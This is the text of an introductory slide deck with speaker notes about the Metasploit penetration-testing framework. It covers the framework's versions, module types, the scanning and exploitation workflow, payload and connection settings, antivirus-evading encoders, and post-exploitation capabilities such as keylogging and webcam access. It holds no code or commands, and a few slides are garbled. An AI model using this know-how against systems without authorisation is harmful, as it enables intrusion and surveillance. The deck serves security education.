  • 11. METASPLOIT VERSIONS •1.0 released in 2003 (Perl) •2.0 released in 2004 (Better Perl) –2.7 released in late 2006 •3.0 released in 2007 (Ruby) –3.2 released in late 2008 –3.3 released in late 2009 –3.4 released in early 2010 –3.4.1 is the most recent release •Metasploit now has 567 exploits and 283 auxiliary modules (up from 551 and 261 in v3.4)
  • 12. VERSIONS AND BASICS - Metasploit Framework Edition • The free version - Metasploit Community Edition • A free, web-based user interface for Metasploit - Metasploit Express • An open-core commercial edition for security teams who need to verify vulnerabilities - Metasploit Pro • An open-core commercial Metasploit edition for penetration testers - Armitage • Is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits.
  • 13. • Runs on any operating system -Source code for Linux / Unix / MacOS X -Portable to Windows via CYGWIN • Allows anyone to exploit & usually “root” certain machines with only an IP address and a basic background of the system • Requires no knowledge of the software bug, or exploit machine cod
  • 15. WITH METASPLOIT, YOU CAN PERFORM THE FOLLOWING OPERATIONS Conduct basic penetration tests on small networks Run spot checks on the exploitability of vulnerabilities Discover the network or import data Browse exploit modules and run individual exploits on hosts.
  • 16. HIERARCHY BUILDS UP LIKE THIS
  • 17. • Auxiliary modules – are used for information gathering, enumeration, port scanning and that sort of thing. There are plenty of useful tools in there too for things like connecting to SQL databases and even tools for performing man-in- middle attacks. • Exploit modules – are generally used to deliver exploit code to a target system. • Post modules – offer post exploitation tools such as the ability to extract password hashes and access tokens and even modules for things like taking a screenshot, logging and downloading files. • Payload modules – are used to create malicious payloads for use with an exploit
  • 18.
  • 19. AUXILIARY • Typically, an Exploit without Payload is called Auxiliary. • Used for scanning, fuzzing, and some automated tasks. • Makes use of mixins. • To run type in Run.
  • 20. ENCODERS • To evade anti-viruses encoders are used. • Payload’s are encrypted
  • 21. NOPS • Mainly used to keep the size of the payload consistent. • Having 10 nops.
  • 22. SCANNING USING METASPLOIT • Discovery Through Vulnerability Scanning Vulnerability scanning will allow you to quickly scan a target IP range looking for known vulnerabilities, giving a penetration tester a quick idea of what attacks might be worth conducting. • Port Scanning: A port scan is a series of messages sent by someone attempting to break into a computer to learn which computer network services, each associated with a “well- known” port number, the computer provides. Port scanning, a favorite approach of computer cracker, gives the assailant an idea where to probe for weaknesses.
  • 23. HOW A DISCOVERY SCAN WORKS A discovery scan can be divided into four distinct phases: • Ping scan - determines if the hosts are online • Port scan - identify the ports that are open and the services are available on those ports • OS and version detection - detects the service version numbers and operating system based on how the system responds to the probes • Data import - collects all the data and creates a report and imports the data into the project
  • 24. EXPLOITATION An exploit is the use of software, data, or commands to “exploit” a weakness in a computer system or program to carry out some of malicious intent, such as a denial-of-service attack, Trojan worms or viruses. The weakness in the system can be a bug, a or simply a design vulnerability. The process is known as exploitation. The following are the five steps in the exploitation process: scanning the target selecting an exploit selecting a payload encoding the exploit launching the attack
  • 25. • Scanning the target To scan the target, we use port scanning and vulnerability scanning techniques in which we perform scanning by using different tools like nmap, nessus and etc. • Selecting the exploit This process includes the selection of exploit. • Selecting the payload Payloads are the commands the attacker runs upon a successful completion of their exploit. • Encoding the exploit Encoding in Metasploit is how the exploit and payload are packaged together, and is often done automatically, via the set commands. Launching the attack Once all the settings have been set, the attacker simply calls an exploit.
  • 26. EXPLOITING VULNERABILITIES: Metasploit offers a couple different methods you can use to perform exploitation: Auto-exploitation. Manual exploitation. Auto-Exploitation: The auto-exploitation feature cross-references open services, vulnerability references, and fingerprints to find matching exploits. The simple goal of auto-exploitation is to get a session as quickly as possible by leveraging the data that Metasploit has for the target hosts. Manual Exploitation: Manual exploitation provides a more targeted and methodical approach exploiting vulnerabilities. This method is particularly useful if there is a specific vulnerability that you want to exploit.
  • 27. Payload Type: Specifies the type of payload that the exploit will deliver to the target. Choose one of the following payload types: • Command: A command execution payload that enables you to execute commands on the remote machine. • Meterpreter: An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.
  • 28. Connection Type: Specifies how you want your Metasploit instance to connect to the target. Choose one of the following connection types: • Auto: Automatically uses a bind connection when NAT is detected; otherwise, a reverse connection is used. • Bind: Uses a bind connection, which is useful when the targets are behind a firewall or a NAT gateway. • Reverse: Uses a reverse connection, which is useful if your system is unable to initiate connections to the targets.
  • 29. • LHOST: Defines the address for the local host. • LPORT: Defines the ports that you want to use for reverse connections. • RHOST: Defines the target address. • RPORT: Defines the remote port you want to attack. • Target Settings: Specifies the target operating system and version. • Exploit Timeout: Defines the timeout in minutes.
  • 30. POST EXPLOITATION • Post exploitation is an important process in a penetration test as it allows the attacker to gather information from the system that he has exploited. A lot of penetration testers are using the Metasploit framework modules for system exploitation. However, Metasploit provides and modules for post exploitation activities for a variety of systems. • Margate's to another process which has admin privileges and then completes the task.
  • 31. • Using this meterpreter we can perform different tasks by getting the privileges of the victim • Can grab a screen shot’s, keylogging by loading and much more with -Espia -Incognito -Pivot -Sniffer -Priv -Stdapi (By Default)
  • 32. • What else we can do in post exploitation? Let’s list some of them, -Keylogging -Screen shots -view live screen -access webcam -take control of keyboard and mouse -del user -pivort -vm detection and many more..
  • 33. • Advantages Open source Frequently updated • Disadvantages Difficult to learn Can crash your system if not used wisely Requires deep knowledge for exploit development
  • 34. IT IS USEFUL FOR  Future penetration testers  Vulnerability assessment personnel  Security Engineers  Security Researchers  Auditors  Programmers  Any IT professional who has to test regularly to maintain compliance requirements  Any IT professional who runs scheduled testing of security infrastructure as a best practice
  • 35. SUMMARY • Metasploit is very easy to use, and very powerful • Web interface allows the scans to be run from any system, on any operating system • Evidence may or may not be left behind on the system • IDS/IPS will sense these exploits • Only contains old & well known exploits
  • 36. NOTE • Never misuse it your personal purpose • Use it wisely • Understand the modules before using • Test it using virtual machines

Editor's Notes

  1. It was designed and developed by H.D.Moore in 2003. Firstly it was written in perl then It was re-written in Ruby script
  2. Honeypots ( computer system that is set up to act as a decoy to lure cyber attackers, and to detect, deflect or study attempts to gain unauthorized access to information systems)
  3. Runs on any operating system
  4. - FILESYSTEM AND LIBRARIES Metasploit Filesystem The MSF filesystem is laid out in an intuitive manner and is organized by directory. • data: editable files used by Metasploit • documentation: provides documentation for the framework • external: source code and third-party libraries • lib: the ‘meat’ of the framework code base • modules: the actual MSF modules • plugins:plugins that can be loaded at run-time • scripts:Meterpreter and other scripts • tools:various useful command-line utilities Metasploit Libraries The MSF libraries help us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads.
  5. It has 1500+ tested exploits, 400+ payloads and 40+ encoders. It offers “plug and play” of payloads which alone is huge advantage.
  6. In object-oriented programming languages, a Mixin is a class that contains methods for use by other classes without having to be the parent class of those other classes.
  7. Requires no knowledge of software bug or exploit machine code. Allows anyone to exploit and usually “root” . Certain machines with only “ip address” and a basic background system.